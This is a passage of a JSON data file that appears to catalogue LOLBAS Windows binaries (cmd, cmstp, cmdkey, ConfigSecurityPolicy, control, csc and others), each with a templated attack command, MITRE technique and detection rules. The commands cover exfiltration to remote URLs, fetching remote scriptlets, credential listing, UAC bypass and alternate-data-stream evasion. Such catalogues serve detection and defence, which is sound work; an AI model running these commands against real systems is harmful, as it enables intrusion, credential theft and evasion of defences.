server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"]},{"id":"lolbas:cmd-exe:3","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"type {PATH_ABSOLUTE} > {PATH_SMB}","description":"Uploads a specified file to a WebDAV server.","usecase":"Upload a file to a WebDAV server","mitre":["T1048.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"]},{"id":"lolbas:cmdkey-exe:0","toolId":"lolbas:cmdkey-exe","toolName":"Cmdkey.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"cmdkey /list","description":"List cached credentials","usecase":"Get credential information from host","mitre":["T1078"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmdkey.exe","C:\\Windows\\SysWOW64\\cmdkey.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml"}],"references":["https://web.archive.org/web/20230202122017/https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey","https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/"]},{"id":"lolbas:cmdl32-exe:0","toolId":"lolbas:cmdl32-exe","toolName":"cmdl32.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"cmdl32 /vpn /lan %cd%\\config","description":"Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where \"X\" denotes a random number or letter.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmdl32.exe","C:\\Windows\\SysWOW64\\cmdl32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml"},{"type":"IOC","value":"Reports of downloading from suspicious URLs in %TMP%\\config.log"},{"type":"IOC","value":"Useragent Microsoft(R) Connection Manager Vpn File Update"}],"references":["https://github.com/LOLBAS-Project/LOLBAS/pull/151","https://twitter.com/ElliotKillick/status/1455897435063074824","https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/","https://lolbas-project.github.io/lolbas/Binaries/cmdl32/"]},{"id":"lolbas:cmstp-exe:0","toolId":"lolbas:cmstp-exe","toolName":"Cmstp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}","description":"Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.","usecase":"Execute code hidden within an inf file. Download and run scriptlets from internet.","mitre":["T1218.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"IOC","value":"Execution of cmstp.exe without a VPN use case is suspicious"},{"type":"IOC","value":"DotNet CLR libraries loaded into cmstp.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cmstp.exe.log"},{"type":"IOC","value":"Registry modification to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll"}],"references":["https://twitter.com/NickTyrer/status/958450014111633408","https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80","https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e","https://oddvar.moe/2017/08/15/research-on-cmstp-exe/","https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp","https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc","https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"]},{"id":"lolbas:cmstp-exe:1","toolId":"lolbas:cmstp-exe","toolName":"Cmstp.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"cmstp.exe /ni /s {REMOTEURL:.inf}","description":"Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.","usecase":"Execute code hidden within an inf file. Execute code directly from Internet.","mitre":["T1218.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"IOC","value":"Execution of cmstp.exe without a VPN use case is suspicious"},{"type":"IOC","value":"DotNet CLR libraries loaded into cmstp.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cmstp.exe.log"},{"type":"IOC","value":"Registry modification to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll"}],"references":["https://twitter.com/NickTyrer/status/958450014111633408","https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80","https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e","https://oddvar.moe/2017/08/15/research-on-cmstp-exe/","https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp","https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc","https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"]},{"id":"lolbas:cmstp-exe:2","toolId":"lolbas:cmstp-exe","toolName":"Cmstp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cmstp.exe /nf","description":"cmstp.exe reads the `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll` registry value and passes its data directly to `LoadLibrary`. By modifying this registry key and setting it to an attack-controlled DLL, this will sideload the DLL via `cmstp.exe`.","usecase":"Proxy execution of a malicious DLL via registry modification.","mitre":["T1218.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"IOC","value":"Execution of cmstp.exe without a VPN use case is suspicious"},{"type":"IOC","value":"DotNet CLR libraries loaded into cmstp.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cmstp.exe.log"},{"type":"IOC","value":"Registry modification to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll"}],"references":["https://twitter.com/NickTyrer/status/958450014111633408","https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80","https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e","https://oddvar.moe/2017/08/15/research-on-cmstp-exe/","https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp","https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc","https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"]},{"id":"lolbas:colorcpl-exe:0","toolId":"lolbas:colorcpl-exe","toolName":"Colorcpl.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"colorcpl {PATH}","description":"Copies the referenced file to C:\\Windows\\System32\\spool\\drivers\\color\\.","usecase":"Copies file(s) to a subfolder of a generally trusted folder (c:\\Windows\\System32), which can be used to hide files or make them blend into the environment.","mitre":["T1036.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\colorcpl.exe","C:\\Windows\\SysWOW64\\colorcpl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml"},{"type":"IOC","value":"colorcpl.exe writing files"}],"references":["https://twitter.com/eral4m/status/1480468728324231172","https://lolbas-project.github.io/lolbas/Binaries/Colorcpl/"]},{"id":"lolbas:computerdefaults-exe:0","toolId":"lolbas:computerdefaults-exe","toolName":"ComputerDefaults.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"ComputerDefaults.exe","description":"Upon execution, ComputerDefaults.exe checks two registry values at HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\Shell\\open\\command; if these are set by an attacker, the set command will be executed as a high-integrity process without a UAC prompt being displayed to the user. See 'resources' for which registry keys/values to set.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\ComputerDefaults.exe","C:\\Windows\\SysWOW64\\ComputerDefaults.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Event ID 10"},{"type":"IOC","value":"A binary or script spawned as a child process of ComputerDefaults.exe"},{"type":"IOC","value":"Changes to HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\Shell\\open\\command"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml"}],"references":["https://gist.github.com/havoc3-3/812547525107bd138a1a839118a3a44b","https://lolbas-project.github.io/lolbas/Binaries/ComputerDefaults/"]},{"id":"lolbas:configsecuritypolicy-exe:0","toolId":"lolbas:configsecuritypolicy-exe","toolName":"ConfigSecurityPolicy.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}","description":"Upload file, credentials or data exfiltration in general","usecase":"Upload file","mitre":["T1567"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml"},{"type":"IOC","value":"ConfigSecurityPolicy storing data into alternate data streams."},{"type":"IOC","value":"Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe."},{"type":"IOC","value":"User Agent is \"MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\""}],"references":["https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor","https://twitter.com/NtSetDefault/status/1302589153570365440?s=20","https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/"]},{"id":"lolbas:configsecuritypolicy-exe:1","toolId":"lolbas:configsecuritypolicy-exe","toolName":"ConfigSecurityPolicy.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ConfigSecurityPolicy.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml"},{"type":"IOC","value":"ConfigSecurityPolicy storing data into alternate data streams."},{"type":"IOC","value":"Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe."},{"type":"IOC","value":"User Agent is \"MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\""}],"references":["https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor","https://twitter.com/NtSetDefault/status/1302589153570365440?s=20","https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/"]},{"id":"lolbas:conhost-exe:0","toolId":"lolbas:conhost-exe","toolName":"Conhost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"conhost.exe {CMD}","description":"Execute a command line with conhost.exe as parent process","usecase":"Use conhost.exe as a proxy binary to evade defensive counter-measures","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\conhost.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"conhost.exe spawning unexpected processes"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml"}],"references":["https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/","https://twitter.com/Wietze/status/1511397781159751680","https://twitter.com/embee_research/status/1559410767564181504","https://twitter.com/ankit_anubhav/status/1561683123816972288","https://lolbas-project.github.io/lolbas/Binaries/Conhost/"]},{"id":"lolbas:conhost-exe:1","toolId":"lolbas:conhost-exe","toolName":"Conhost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"conhost.exe --headless {CMD}","description":"Execute a command line with conhost.exe as parent process","usecase":"Specify --headless parameter to hide child process window (if applicable)","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\conhost.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"conhost.exe spawning unexpected processes"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml"}],"references":["https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/","https://twitter.com/Wietze/status/1511397781159751680","https://twitter.com/embee_research/status/1559410767564181504","https://twitter.com/ankit_anubhav/status/1561683123816972288","https://lolbas-project.github.io/lolbas/Binaries/Conhost/"]},{"id":"lolbas:control-exe:0","toolId":"lolbas:control-exe","toolName":"Control.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"control.exe {PATH_ABSOLUTE}:evil.dll","description":"Execute evil.dll which is stored in an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1218.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\control.exe","C:\\Windows\\SysWOW64\\control.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"Control.exe executing files from alternate data streams"},{"type":"IOC","value":"Control.exe executing library file without cpl extension"},{"type":"IOC","value":"Suspicious network connections from control.exe"}],"references":["https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/","https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/","https://twitter.com/bohops/status/955659561008017409","https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items","https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/","https://lolbas-project.github.io/lolbas/Binaries/Control/"]},{"id":"lolbas:control-exe:1","toolId":"lolbas:control-exe","toolName":"Control.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"control.exe {PATH_ABSOLUTE:.cpl}","description":"Execute .cpl file. A CPL is a DLL file with CPlApplet export function)","usecase":"Use to execute code and bypass application whitelisting","mitre":["T1218.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\control.exe","C:\\Windows\\SysWOW64\\control.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"Control.exe executing files from alternate data streams"},{"type":"IOC","value":"Control.exe executing library file without cpl extension"},{"type":"IOC","value":"Suspicious network connections from control.exe"}],"references":["https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/","https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/","https://twitter.com/bohops/status/955659561008017409","https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items","https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/","https://lolbas-project.github.io/lolbas/Binaries/Control/"]},{"id":"lolbas:csc-exe:0","toolId":"lolbas:csc-exe","toolName":"Csc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"csc.exe -out:{PATH:.exe} {PATH:.cs}","description":"Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to the specified .exe path.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml"},{"type":"IOC","value":"Csc.exe should normally not run as System account unless it is used for development."}],"references":["https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/","https://lolbas-project.github.io/lolbas/Binaries/Csc/"]},{"id":"lolbas:csc-exe:1","toolId":"lolbas:csc-exe","toolName":"Csc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"csc -target:library {PATH:.cs}","description":"Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to a DLL file with the same name.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml"},{"type":"IOC","value":"Csc.exe should normally not run as System account unless it is used for development."}],"references":["https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/","https://lolbas-project.github.io/lolbas/Binaries/Csc/"]},{"id":"lolbas:cscript-exe:0","toolId":"lolbas:cscript-exe","toolName":"Cscript.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"cscript //e:vbscript {PATH_ABSOLUTE}:script.vbs","description":"Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence 